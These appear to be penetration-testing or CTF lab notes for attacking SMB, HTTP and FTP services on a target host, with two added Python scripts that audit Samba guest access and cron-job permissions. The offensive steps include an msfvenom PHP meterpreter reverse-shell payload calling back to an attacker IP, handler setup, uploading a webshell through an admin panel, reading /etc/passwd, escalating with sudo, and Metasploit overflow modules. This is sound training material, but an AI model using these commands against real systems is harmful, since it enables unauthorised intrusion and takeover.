SMB Information Disclosure
First, scan for open services and gather detailed information about all of them:
nmap -sV IP
nmap -A -v -T4 IP
For SMB, try logging in with an empty password, then download files and look for sensitive information.
smbclient -L IP            list the SMB shares on the host
smbclient '\\IP\share'     connect to the shared folder
get file                   download a file
Known vulnerabilities in the detected version can also be used:
searchsploit <version>
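The empty-password login above works only when the server maps failed or anonymous logins to the guest account and exposes guest-accessible shares. The following script is an added defender-side check, not part of the original notes: it parses a Samba smb.conf and reports the settings that create that exposure. The configuration text is constructed for illustration; the parameter names (map to guest, guest ok, public, read only, writable, server min protocol) are real Samba options.

```python
"""Audit a Samba smb.conf for settings that allow anonymous (empty-password) access.

Added example for these notes; the sample configuration below is constructed.
"""
from typing import Dict, List

# Constructed smb.conf for a hypothetical host (not a real deployment).
SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   map to guest = Bad User
   server min protocol = NT1

[homes]
   browseable = no
   read only = no

[public]
   path = /srv/samba/public
   guest ok = yes
   read only = yes

[backups]
   path = /srv/backups
   public = yes
   writable = yes
"""

TRUTHY = {"yes", "true", "1"}


def parse_smb_conf(text: str) -> Dict[str, Dict[str, str]]:
    """Parse the INI-like smb.conf into {section: {parameter: value}}.

    Samba parameter names are case-insensitive and may contain spaces, so keys
    are normalised to lowercase with single spaces; values are lowercased too.
    """
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections[current] = {}
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        key = " ".join(key.lower().split())
        sections[current][key] = value.strip().lower()
    return sections


def audit_smb_conf(text: str) -> List[str]:
    """Return human-readable findings describing anonymous-access exposure."""
    conf = parse_smb_conf(text)
    findings: List[str] = []
    g = conf.get("global", {})
    # "map to guest = bad user" turns an unknown user or empty password into a guest session.
    if g.get("map to guest", "never") != "never":
        findings.append(f"[global] map to guest = {g['map to guest']}: failed logins become guest sessions")
    # NT1 as the minimum protocol keeps SMBv1 enabled.
    if g.get("server min protocol", "smb2_02") == "nt1":
        findings.append("[global] server min protocol = NT1: SMBv1 is enabled")
    for name, params in conf.items():
        if name == "global":
            continue
        # "public" is a synonym for "guest ok".
        guest = params.get("guest ok", params.get("public", "no")) in TRUTHY
        if not guest:
            continue
        # "writable"/"writeable" is the inverse of "read only" (default: read only = yes).
        writable = (params.get("writable", params.get("writeable", "no")) in TRUTHY
                    or params.get("read only", "yes") not in TRUTHY)
        findings.append(f"[{name}] guest access {'read/write' if writable else 'read-only'}")
    return findings


if __name__ == "__main__":
    for finding in audit_smb_conf(SAMPLE_SMB_CONF):
        print(finding)
```

Running it against the constructed configuration reports the guest mapping, SMBv1, a read-only guest share and a read/write guest share; a hardened configuration (map to guest = Never, no guest ok / public shares, a SMB2 minimum protocol) produces no findings.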
HTTP vulnerability analysis
View the web pages in a browser.
Probe with dirb and nikto.
Log in to the target service's admin backend and upload a webshell.
Pay particular attention to database users.
Generating the webshell
msfvenom -p php/meterpreter/reverse_tcp lhost=<attacker IP> lport=4444 -f raw > /root/Desktop/shell.php
Using the webshell
msfconsole
> use exploit/multi/handler
> set payload php/meterpreter/reverse_tcp
> show options
> set lhost <attacker IP>
> run
Upload the shell at the 404 upload point, then access it through the web page.
Upgrading the shell
python -c "import pty; pty.spawn('/bin/bash')"
View users
cat /etc/passwd
su          switch user
sudo -l     list the commands this user may run with sudo
sudo su     obtain root
Also check /tmp and the scheduled tasks in /etc/crontab; a cron task can be used to spawn a reverse shell.
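The crontab note above describes a classic privilege-escalation path: a root cron job that executes a script which a lower-privileged user can modify. The following script is an added defender-side audit, not part of the original notes: it parses /etc/crontab-style entries and flags commands that run from a temp directory, are writable by group or others, or run as root while owned by another user. The crontab text and the file ownership/mode table are constructed for a hypothetical host; in practice the metadata would come from os.stat().

```python
"""Audit system crontab entries for scripts a non-root user could tamper with.

Added example for these notes; the crontab and file metadata below are constructed.
"""
import re
import stat
from typing import Dict, List, NamedTuple, Tuple


class FileInfo(NamedTuple):
    owner: str   # owning user name
    mode: int    # permission bits, e.g. 0o755


# Constructed /etc/crontab for a hypothetical host.
SAMPLE_CRONTAB = """
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/5 *   * * *   root    /tmp/cleanup.sh
0 3     * * *   root    /opt/backup/run_backup.sh
30 2    * * *   root    /usr/local/bin/rotate_logs.py
0 4     * * *   www-data /var/www/html/refresh.sh
"""

# Constructed ownership and mode for the referenced files (stand-in for os.stat()).
SAMPLE_FILES: Dict[str, FileInfo] = {
    "/tmp/cleanup.sh": FileInfo("bob", 0o777),
    "/opt/backup/run_backup.sh": FileInfo("root", 0o775),   # group-writable
    "/usr/local/bin/rotate_logs.py": FileInfo("root", 0o755),
    "/var/www/html/refresh.sh": FileInfo("www-data", 0o755),
}

ENV_ASSIGNMENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")
TEMP_DIRS = ("/tmp/", "/var/tmp/")


def parse_system_crontab(text: str) -> List[Tuple[str, str]]:
    """Parse /etc/crontab lines into (user, command) pairs.

    The system crontab has a user field between the five schedule fields and
    the command; comments and VAR=value lines are skipped.
    """
    entries: List[Tuple[str, str]] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or ENV_ASSIGNMENT.match(line):
            continue
        fields = line.split(None, 6)
        if len(fields) < 7:
            continue
        entries.append((fields[5], fields[6]))
    return entries


def audit_cron_entries(crontab_text: str, files: Dict[str, FileInfo]) -> List[str]:
    """Flag cron commands whose executable could be replaced by a non-root user."""
    findings: List[str] = []
    for user, command in parse_system_crontab(crontab_text):
        # Examine every absolute path in the command line, not only the first token.
        for path in (tok for tok in command.split() if tok.startswith("/")):
            if path.startswith(TEMP_DIRS):
                findings.append(f"{path} run as {user} from a world-writable temp directory")
            info = files.get(path)
            if info is None:
                continue
            if info.mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append(f"{path} run as {user} is writable by group or others (mode {oct(info.mode)})")
            if user == "root" and info.owner != "root":
                findings.append(f"{path} run as root but owned by {info.owner}")
    return findings


if __name__ == "__main__":
    for finding in audit_cron_entries(SAMPLE_CRONTAB, SAMPLE_FILES):
        print(finding)
```

On the constructed input the /tmp script is reported three times (temp directory, world-writable, non-root owner) and the group-writable backup script once; a root-owned 0o755 script in a system path produces no finding. Scripts in /etc/cron.d, /etc/cron.* directories and per-user crontabs (which have no user field) need the same check with the user taken from the file rather than the line.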
FTP
1. nmap scan
   nmap -sV -A -v -T4 IP
2. Port 21 is the FTP port.
3. searchsploit <version> to find an exploit script; adjust its parameters and run the code.
4. Or use msf with a remote overflow module:
   msfconsole
   > search <version>
   > use exploit/...
   > show payloads
   > set payload <payload>
   > show options
   > set <the various parameters>
   > exploit
5. id    check current privileges
   Upgrade the terminal:
   python -c "import pty; pty.spawn('/bin/bash')"
6. Find the flag.